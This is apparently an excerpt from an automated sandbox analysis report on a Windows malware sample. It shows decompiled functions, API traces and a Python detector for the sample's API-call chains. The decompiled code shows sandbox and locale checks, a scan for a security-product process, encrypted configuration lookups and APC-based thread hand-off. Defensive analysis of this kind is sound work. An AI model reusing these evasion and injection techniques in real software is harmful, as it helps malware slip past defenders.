                  • Part of subcall function 00501FCF: GetCurrentProcessId.KERNEL32(?,00501C63), ref: 00502009
                  • Part of subcall function 00501FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00501C63), ref: 00502022
                  • Part of subcall function 0050154D: RtlAllocateHeap.NTDLL(00000000,?,00501477), ref: 00501559
                • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00501C8D
                • Sleep.KERNEL32(00000000,00000030), ref: 00501CD4
                • GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00501CFC
                • GetSystemDefaultUILanguage.KERNEL32 ref: 00501D06
                • VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00501D19
                • CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00501D8E
                • QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 00501DA4
                • GetLastError.KERNEL32 ref: 00501DB4
                • TerminateThread.KERNEL32(00000000,00000000), ref: 00501DBE
                • SetLastError.KERNEL32(00000000), ref: 00501DCA
                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00501DD7
                • GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00501DE9
                • GetLastError.KERNEL32 ref: 00501DF4
                • GetLastError.KERNEL32 ref: 00501E05
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID: ErrorLast$Thread$CreateLanguageProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleNameObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                • String ID:
                • API String ID: 1666582358-0
                • Opcode ID: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                • Instruction ID: 44a3aebddb2bbbfa53ecaca520c9d06d5550ba231b4703d8973d3a448cd2bfe3
                • Opcode Fuzzy Hash: 2f7a3bb356b8b54c1b3c7e8ff32702db1cbd6d7b6564eab963341c519062ef97
                • Instruction Fuzzy Hash: 0B51A176901915BBE721EFB59D489AFBF7DBB84751F104025F901E6190E730CE408BAA
                Uniqueness

                Uniqueness Score: -1.00%
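
The API list above for the function at 0x00501C8D reads as three evasion and hand-off steps: NtQuerySystemInformation with class 8 (SystemProcessorPerformanceInformation) and a 0x30-byte buffer, the size of one SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION entry, followed by Sleep; GetLocaleInfoA(LOCALE_USER_DEFAULT = 0x400, LOCALE_SISO3166CTRYNAME = 0x5A) together with GetSystemDefaultUILanguage and VerLanguageNameA, a country and UI-language check; and CreateThread followed by QueueUserAPC(0x0040139F, ...) and WaitForSingleObject/GetExitCodeThread, which hands the code at 0x0040139F (the address immediately after the end of E004012FB) to a fresh thread as an APC. The Python below is an added example, not the report's or the sample's code: it parses lines in the report's own API format and checks for those three ordered chains, skipping "Part of subcall function" entries so that only the function's own calls count. The chain names and predicates are the example's own; the embedded lines are copied from the list above.

```python
"""Added example, not the report's or the sample's code: ordered API-chain checks
over lines in the format of the report's API lists."""
import re

CALL_RE = re.compile(
    r"^(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")

SystemProcessorPerformanceInformation = 8   # SYSTEM_INFORMATION_CLASS
LOCALE_USER_DEFAULT = 0x0400
LOCALE_SISO3166CTRYNAME = 0x5A              # two-letter ISO 3166 country code


def parse_call(line):
    """One report line -> dict(api, module, args with None for '?', ref, parent) or None."""
    m = CALL_RE.match(line.strip().lstrip("• ").strip())
    if not m:
        return None
    raw = m.group("args")
    args = [] if not raw else [None if a == "?" else int(a, 16) for a in raw.split(",")]
    return {"api": m.group("api"), "module": m.group("module"), "args": args,
            "ref": m.group("ref").upper(), "parent": m.group("parent")}


def parse_trace(lines):
    return [c for c in (parse_call(l) for l in lines) if c]


def arg(call, i):
    return call["args"][i] if i < len(call["args"]) else None


# Each chain is an ordered list of (api, predicate or None); unrelated calls may sit in between.
CHAINS = {
    "cpu_perf_probe_then_sleep": [
        ("NtQuerySystemInformation",
         lambda c: arg(c, 0) == SystemProcessorPerformanceInformation and arg(c, 2) == 0x30),
        ("Sleep", None),
    ],
    "country_and_ui_language_check": [
        ("GetLocaleInfoA",
         lambda c: arg(c, 0) == LOCALE_USER_DEFAULT and arg(c, 1) == LOCALE_SISO3166CTRYNAME),
        ("GetSystemDefaultUILanguage", None),
        ("VerLanguageNameA", None),
    ],
    "apc_queued_to_fresh_thread": [
        ("CreateThread", None),
        ("QueueUserAPC", lambda c: arg(c, 0) is not None),
        ("WaitForSingleObject", None),
        ("GetExitCodeThread", None),
    ],
}


def find_chain(calls, chain):
    """Refs of the first in-order match of `chain`, or None; subcall entries are skipped."""
    refs, step = [], 0
    for c in calls:
        if c["parent"] is not None:
            continue
        api, pred = chain[step]
        if c["api"] == api and (pred is None or pred(c)):
            refs.append(c["ref"])
            step += 1
            if step == len(chain):
                return refs
    return None


def evaluate(lines):
    calls = parse_trace(lines)
    hits = {}
    for name, chain in CHAINS.items():
        refs = find_chain(calls, chain)
        if refs:
            hits[name] = refs
    return hits


# Copied from the report's API list for 0x00501C8D (a subset, not constructed).
REPORT_LINES = [
    "• Part of subcall function 00501FCF: OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00501C63), ref: 00502022",
    "• NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00501C8D",
    "• Sleep.KERNEL32(00000000,00000030), ref: 00501CD4",
    "• GetLocaleInfoA.KERNEL32(00000400,0000005A,?,00000004), ref: 00501CFC",
    "• GetSystemDefaultUILanguage.KERNEL32 ref: 00501D06",
    "• VerLanguageNameA.KERNEL32(?,?,00000004), ref: 00501D19",
    "• CreateThread.KERNEL32(00000000,00000000,00000000,00000000), ref: 00501D8E",
    "• QueueUserAPC.KERNEL32(0040139F,00000000,?), ref: 00501DA4",
    "• WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00501DD7",
    "• GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00501DE9",
]

if __name__ == "__main__":
    for name, refs in evaluate(REPORT_LINES).items():
        print(f"{name}: {' -> '.join(refs)}")
```

The argument columns in these lists are raw stack slots, so a predicate should only read positions the API actually defines (Sleep has one parameter; the second value after it is stack residue), and the APC routine address is deliberately not pinned to 0x0040139F so the same chain fires on other builds.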

                C-Code - Quality: 93%
                			E02221D8A(void* __ebx, int* __ecx, void* __edx, void* __edi, void* __esi) {
                				int _v8;
                				void* _v12;
                				void* _v16;
                				signed int _t28;
                				signed int _t33;
                				signed int _t39;
                				char* _t45;
                				char* _t46;
                				char* _t47;
                				char* _t48;
                				char* _t49;
                				char* _t50;
                				void* _t51;
                				void* _t52;
                				void* _t53;
                				intOrPtr _t54;
                				void* _t56;
                				intOrPtr _t57;
                				intOrPtr _t58;
                				signed int _t61;
                				intOrPtr _t64;
                				signed int _t65;
                				signed int _t70;
                				void* _t72;
                				void* _t73;
                				signed int _t75;
                				signed int _t78;
                				signed int _t82;
                				signed int _t86;
                				signed int _t90;
                				signed int _t94;
                				signed int _t98;
                				void* _t101;
                				void* _t102;
                				void* _t116;
                				void* _t119;
                				intOrPtr _t122;
                
                				_t119 = __esi;
                				_t116 = __edi;
                				_t104 = __ecx;
                				_t101 = __ebx;
                 				_t28 =  *0x222a344; // 0x43175ac3, the seed: every lookup key in this function is an immediate XORed with it
                 				if(E022210F8( &_v8,  &_v12, _t28 ^ 0xa23f04a7) != 0 && _v12 >= 0x110) {
                					 *0x222a374 = _v8;
                				}
                				_t33 =  *0x222a344; // 0x43175ac3
                				if(E022210F8( &_v16,  &_v12, _t33 ^ 0x2bfce340) == 0) {
                					_v12 = 2;
                					L69:
                					return _v12;
                				}
                				_t39 =  *0x222a344; // 0x43175ac3
                				_push(_t116);
                				if(E022210F8( &_v12,  &_v8, _t39 ^ 0xcca68722) == 0) {
                					L67:
                					HeapFree( *0x222a2d8, 0, _v16);
                					goto L69;
                				} else {
                					_push(_t101);
                					_t102 = _v12;
                					if(_t102 == 0) {
                						_t45 = 0;
                					} else {
                						_t98 =  *0x222a344; // 0x43175ac3
                						_t45 = E022236C5(_t104, _t102, _t98 ^ 0x523046bc);
                					}
                					_push(_t119);
                					if(_t45 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                							 *0x222a2e0 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t46 = 0;
                					} else {
                						_t94 =  *0x222a344; // 0x43175ac3
                						_t46 = E022236C5(_t104, _t102, _t94 ^ 0x0b3e0d40);
                					}
                					if(_t46 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                							 *0x222a2e4 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t47 = 0;
                					} else {
                						_t90 =  *0x222a344; // 0x43175ac3
                						_t47 = E022236C5(_t104, _t102, _t90 ^ 0x1b5903e6);
                					}
                					if(_t47 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                							 *0x222a2e8 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t48 = 0;
                					} else {
                						_t86 =  *0x222a344; // 0x43175ac3
                						_t48 = E022236C5(_t104, _t102, _t86 ^ 0x267c2349);
                					}
                					if(_t48 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
                							 *0x222a004 = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t49 = 0;
                					} else {
                						_t82 =  *0x222a344; // 0x43175ac3
                						_t49 = E022236C5(_t104, _t102, _t82 ^ 0x167db74c);
                					}
                					if(_t49 != 0) {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
                							 *0x222a02c = _v8;
                						}
                					}
                					if(_t102 == 0) {
                						_t50 = 0;
                					} else {
                						_t78 =  *0x222a344; // 0x43175ac3
                						_t50 = E022236C5(_t104, _t102, _t78 ^ 0x02ddbcae);
                					}
                					if(_t50 == 0) {
                						L41:
                						 *0x222a2ec = 5;
                						goto L42;
                					} else {
                						_t104 =  &_v8;
                						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
                							goto L41;
                						} else {
                							L42:
                							if(_t102 == 0) {
                								_t51 = 0;
                							} else {
                								_t75 =  *0x222a344; // 0x43175ac3
                								_t51 = E022236C5(_t104, _t102, _t75 ^ 0x0cbf33fd);
                							}
                							if(_t51 != 0) {
                								_push(_t51);
                								_t72 = 0x10;
                								_t73 = E02225B85(_t72);
                								if(_t73 != 0) {
                									_push(_t73);
                									E0222607C();
                								}
                							}
                							if(_t102 == 0) {
                								_t52 = 0;
                							} else {
                								_t70 =  *0x222a344; // 0x43175ac3
                								_t52 = E022236C5(_t104, _t102, _t70 ^ 0x93710135);
                							}
                							if(_t52 != 0 && E02225B85(0, _t52) != 0) {
                								_t122 =  *0x222a3cc; // 0x2bd9600
                								E02225364(_t122 + 4, _t68);
                							}
                							if(_t102 == 0) {
                								_t53 = 0;
                							} else {
                								_t65 =  *0x222a344; // 0x43175ac3
                								_t53 = E022236C5(_t104, _t102, _t65 ^ 0x175474b7);
                							}
                							if(_t53 == 0) {
                								L59:
                 								_t54 =  *0x222a348; // 0x9ad5a8
                 								_t22 = _t54 + 0x222b5f3; // 0x616d692f, i.e. the bytes "/ima": built-in default used when the field is absent
                 								 *0x222a370 = _t22;
                								goto L60;
                							} else {
                								_t64 = E02225B85(0, _t53);
                								 *0x222a370 = _t64;
                								if(_t64 != 0) {
                									L60:
                									if(_t102 == 0) {
                										_t56 = 0;
                									} else {
                										_t61 =  *0x222a344; // 0x43175ac3
                										_t56 = E022236C5(_t104, _t102, _t61 ^ 0xf8a29dde);
                									}
                									if(_t56 == 0) {
                 										_t57 =  *0x222a348; // 0x9ad5a8
                 										_t23 = _t57 + 0x222b899; // 0x6976612e, i.e. the bytes ".avi": built-in default for this field
                 										_t58 = _t23;
                									} else {
                										_t58 = E02225B85(0, _t56);
                									}
                									 *0x222a3e0 = _t58;
                									HeapFree( *0x222a2d8, 0, _t102);
                									_v12 = 0;
                									goto L67;
                								}
                								goto L59;
                							}
                						}
                					}
                				}
                 			}

                 • Addresses: 0x02221d8a to 0x02222050

                APIs
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221E2F
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221E61
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221E93
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221EC5
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221EF7
                • StrToIntExA.SHLWAPI(00000000,00000000,?,0222A00C,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?), ref: 02221F29
                • HeapFree.KERNEL32(00000000,?,00000008,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 02222028
                • HeapFree.KERNEL32(00000000,?,?,?,43175AC3,00000005,?,?,43175AC3,?,?,43175AC3,?,?), ref: 0222203C
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: FreeHeap
                • String ID:
                • API String ID: 3298025750-0
                • Opcode ID: 9f323ac73dd9bd4336db69ce15323151a6a59e9052adefd177d9a579f3862204
                • Instruction ID: 08b4a944c1d03be32418ed7d404efde8a1cd655b15f10de0c5f88c5fbb4b5901
                • Opcode Fuzzy Hash: 9f323ac73dd9bd4336db69ce15323151a6a59e9052adefd177d9a579f3862204
                • Instruction Fuzzy Hash: 1781B270E30225BBC720DBF49E8CD6B76EE9B487047650D25A505D720DEB7BDA6C8B20
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 68%
                			E022230D5() {
                				char _v264;
                				void* _v300;
                				int _t8;
                				intOrPtr _t9;
                				int _t15;
                				void* _t17;
                
                				_t15 = 0;
                				_t17 = CreateToolhelp32Snapshot(2, 0);
                				if(_t17 != 0) {
                					_t8 = Process32First(_t17,  &_v300);
                					while(_t8 != 0) {
                						_t9 =  *0x222a348; // 0x9ad5a8
                						_t2 = _t9 + 0x222be88; // 0x73617661
                						_push( &_v264);
                						if( *0x222a12c() != 0) {
                							_t15 = 1;
                						} else {
                							_t8 = Process32Next(_t17,  &_v300);
                							continue;
                						}
                						L7:
                						CloseHandle(_t17);
                						goto L8;
                					}
                					goto L7;
                				}
                				L8:
                				return _t15;
                			}
                0x022230e0
                0x022230ea
                0x022230ee
                0x022230f8
                0x02223129
                0x022230ff
                0x02223104
                0x02223111
                0x0222311a
                0x02223131
                0x0222311c
                0x02223124
                0x00000000
                0x02223124
                0x02223132
                0x02223133
                0x00000000
                0x02223133
                0x00000000
                0x0222312d
                0x02223139
                0x0222313e

                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 022230E5
                • Process32First.KERNEL32(00000000,?), ref: 022230F8
                • Process32Next.KERNEL32(00000000,?), ref: 02223124
                • CloseHandle.KERNEL32(00000000), ref: 02223133
                Memory Dump Source
                • Source File: 00000000.00000002.517761625.0000000002221000.00000020.10000000.00040000.00000000.sdmp, Offset: 02220000, based on PE: true
                • Associated: 00000000.00000002.517752563.0000000002220000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517778721.0000000002229000.00000002.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517787058.000000000222A000.00000004.10000000.00040000.00000000.sdmp
                • Associated: 00000000.00000002.517798246.000000000222C000.00000002.10000000.00040000.00000000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2220000_server.jbxd
                Similarity
                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                • String ID:
                • API String ID: 420147892-0
                • Opcode ID: 0c7d8a02c4149b1493dc83df0f80dade02a0e9481ec2cea02e1152c095a8ca09
                • Instruction ID: 33386ac5cf873cd79b0454190ca64ddf9e9259ac3adba23393b1526d8e9947a4
                • Opcode Fuzzy Hash: 0c7d8a02c4149b1493dc83df0f80dade02a0e9481ec2cea02e1152c095a8ca09
                • Instruction Fuzzy Hash: 3BF0BB325102747ADB30E6E69C49FEB776CEBC5310F0100A1EE45D3018EB66D65DCE61
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00401D68() {
                				void* _t1;
                				unsigned int _t3;
                				void* _t4;
                				long _t5;
                				void* _t6;
                				intOrPtr _t10;
                				void* _t14;
                
                				_t10 =  *0x404170;
                				_t1 = CreateEventA(0, 1, 0, 0);
                				 *0x40417c = _t1;
                				if(_t1 == 0) {
                					return GetLastError();
                				}
                				_t3 = GetVersion();
                				if(_t3 != 5) {
                					L4:
                					if(_t14 <= 0) {
                						_t4 = 0x32;
                						return _t4;
                					} else {
                						goto L5;
                					}
                				} else {
                					if(_t3 >> 8 > 0) {
                						L5:
                						 *0x40416c = _t3;
                						_t5 = GetCurrentProcessId();
                						 *0x404168 = _t5;
                						 *0x404170 = _t10;
                						_t6 = OpenProcess(0x10047a, 0, _t5);
                						 *0x404164 = _t6;
                						if(_t6 == 0) {
                							 *0x404164 =  *0x404164 | 0xffffffff;
                						}
                						return 0;
                					} else {
                						_t14 = _t3 - _t3;
                						goto L4;
                					}
                				}
                			}
                0x00401d69
                0x00401d77
                0x00401d7d
                0x00401d84
                0x00401ddb
                0x00401ddb
                0x00401d86
                0x00401d8e
                0x00401d9b
                0x00401d9b
                0x00401dd7
                0x00401dd9
                0x00000000
                0x00000000
                0x00000000
                0x00401d90
                0x00401d97
                0x00401d9d
                0x00401d9d
                0x00401da2
                0x00401db0
                0x00401db5
                0x00401dbb
                0x00401dc1
                0x00401dc8
                0x00401dca
                0x00401dca
                0x00401dd4
                0x00401d99
                0x00401d99
                0x00000000
                0x00401d99
                0x00401d97

                APIs
                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                • GetVersion.KERNEL32 ref: 00401D86
                • GetCurrentProcessId.KERNEL32 ref: 00401DA2
                • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                Memory Dump Source
                • Source File: 00000000.00000002.517264357.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.517264357.0000000000403000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000405000.00000040.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.517264357.0000000000407000.00000040.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_server.jbxd
                Similarity
                • API ID: Process$CreateCurrentEventOpenVersion
                • String ID:
                • API String ID: 845504543-0
                • Opcode ID: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction ID: a5005e0615366c288a960c89f9170266babf83a3c5a8d8e9540ac284067a1926
                • Opcode Fuzzy Hash: 942fea0c167442ffbc7de75f1a00d0a86d0160437e27dbd34d25ba67bdbb0534
                • Instruction Fuzzy Hash: 79F0AFB05813009BE7509F78BE0DB563F64AB95712F000036E601FA2F8D7709982CB5C
                Uniqueness

                Uniqueness Score: -1.00%

                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.517428823.0000000000500000.00000040.00001000.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_500000_server.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: .$GetProcAddress.$l
                • API String ID: 0-2784972518
                • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                • Instruction ID: c82c370464328a4a26a1431275042aa0e07294963062ef4ecf674b9c31d5cdc2
                • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                • Instruction Fuzzy Hash: 74318AB6900609DFDB10CF99C880BAEBBF9FF48324F24544AD841A7391D771EA45CBA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 49%
                			E022216DF(void* __ecx, intOrPtr* _a4) {
                				signed int _v8;
                				signed int _v12;
                				intOrPtr _v16;
                				intOrPtr _v20;
                				intOrPtr _v24;
                				intOrPtr _v28;
                				intOrPtr _v32;
                				intOrPtr _v36;
                				intOrPtr _v40;
                				intOrPtr _v44;
                				intOrPtr _v48;
                				intOrPtr _v52;
                				intOrPtr _v56;
                				intOrPtr _v60;
                				intOrPtr _v64;
                				intOrPtr _v68;
                				intOrPtr _v72;
                				void _v76;
                				intOrPtr* _t226;
                				signed int _t229;
                				signed int _t231;
                				signed int _t233;
                				signed int _t235;
                				signed int _t237;
                				signed int _t239;
                				signed int _t241;
                				signed int _t243;
                				signed int _t245;
                				signed int _t247;
                				signed int _t249;
                				signed int _t251;
                				signed int _t253;
                				signed int _t255;
                				signed int _t257;
                				signed int _t259;
                				signed int _t338;
                				signed char* _t348;
                				signed int _t349;
                				signed int _t351;
                				signed int _t353;
                				signed int _t355;
                				signed int _t357;
                				signed int _t359;
                				signed int _t361;
                				signed int _t363;
                				signed int _t365;
                				signed int _t367;
                				signed int _t376;
                				signed int _t378;
                				signed int _t380;
                				signed int _t382;
                				signed int _t384;
                				intOrPtr* _t400;
                				signed int* _t401;
                				signed int _t402;
                				signed int _t404;
                				signed int _t406;
                				signed int _t408;
                				signed int _t410;
                				signed int _t412;
                				signed int _t414;
                				signed int _t416;
                				signed int _t418;
                				signed int _t420;
                				signed int _t422;
                				signed int _t424;
                				signed int _t432;
                				signed int _t434;
                				signed int _t436;
                				signed int _t438;
                				signed int _t440;
                				signed int _t508;
                				signed int _t599;
                				signed int _t607;
                				signed int _t613;
                				signed int _t679;
                				void* _t682;
                				signed int _t683;
                				signed int _t685;
                				signed int _t690;
                				signed int _t692;
                				signed int _t697;
                				signed int _t699;
                				signed int _t718;
                				signed int _t720;
                				signed int _t722;
                				signed int _t724;
                				signed int _t726;
                				signed int _t728;
                				signed int _t734;
                				signed int _t740;
                				signed int _t742;
                				signed int _t744;
                				signed int _t746;
                				signed int _t748;
                
                				_t226 = _a4;
                				_t348 = __ecx + 2;
                				_t401 =  &_v76;
                				_t682 = 0x10;
                				do {
                					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                					_t401 =  &(_t401[1]);
                					_t348 =  &(_t348[4]);
                					_t682 = _t682 - 1;
                				} while (_t682 != 0);
                				_t6 = _t226 + 4; // 0x14eb3fc3
                				_t683 =  *_t6;
                				_t7 = _t226 + 8; // 0x8d08458b
                				_t402 =  *_t7;
                				_t8 = _t226 + 0xc; // 0x56c1184c
                				_t349 =  *_t8;
                				asm("rol eax, 0x7");
                				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                				asm("rol ecx, 0xc");
                				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                				asm("ror edx, 0xf");
                				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                				asm("ror esi, 0xa");
                				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                				_v8 = _t685;
                				_t690 = _v8;
                				asm("rol eax, 0x7");
                				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                				asm("rol ecx, 0xc");
                				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                				asm("ror edx, 0xf");
                				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                				asm("ror esi, 0xa");
                				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                				_v8 = _t692;
                				_t697 = _v8;
                				asm("rol eax, 0x7");
                				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                				asm("rol ecx, 0xc");
                				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                				asm("ror edx, 0xf");
                				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                				asm("ror esi, 0xa");
                				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                				_v8 = _t699;
                				asm("rol eax, 0x7");
                				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                				asm("rol ecx, 0xc");
                				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                				_t508 =  !_t357;
                				asm("ror edx, 0xf");
                				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                				_v12 = _t410;
                				_v12 =  !_v12;
                				asm("ror esi, 0xa");
                				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                				asm("rol eax, 0x5");
                				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                				asm("rol ecx, 0x9");
                				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                				asm("rol edx, 0xe");
                				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                				asm("ror esi, 0xc");
                				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                				asm("rol eax, 0x5");
                				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                				asm("rol ecx, 0x9");
                				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                				asm("rol edx, 0xe");
                				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                				asm("ror esi, 0xc");
                				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                				asm("rol eax, 0x5");
                				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                				asm("rol ecx, 0x9");
                				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                				asm("rol edx, 0xe");
                				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                				asm("ror esi, 0xc");
                				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                				asm("rol eax, 0x5");
                				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                				asm("rol ecx, 0x9");
                				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                				asm("rol edx, 0xe");
                				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                				asm("ror esi, 0xc");
                				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                				asm("rol eax, 0x4");
                				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                				asm("rol ecx, 0xb");
                				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                				asm("rol edx, 0x10");
                				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                				_t599 = _t367 ^ _t420;
                				asm("ror esi, 0x9");
                				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                				asm("rol eax, 0x4");
                				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                				asm("rol edi, 0xb");
                				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                				asm("rol edx, 0x10");
                				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
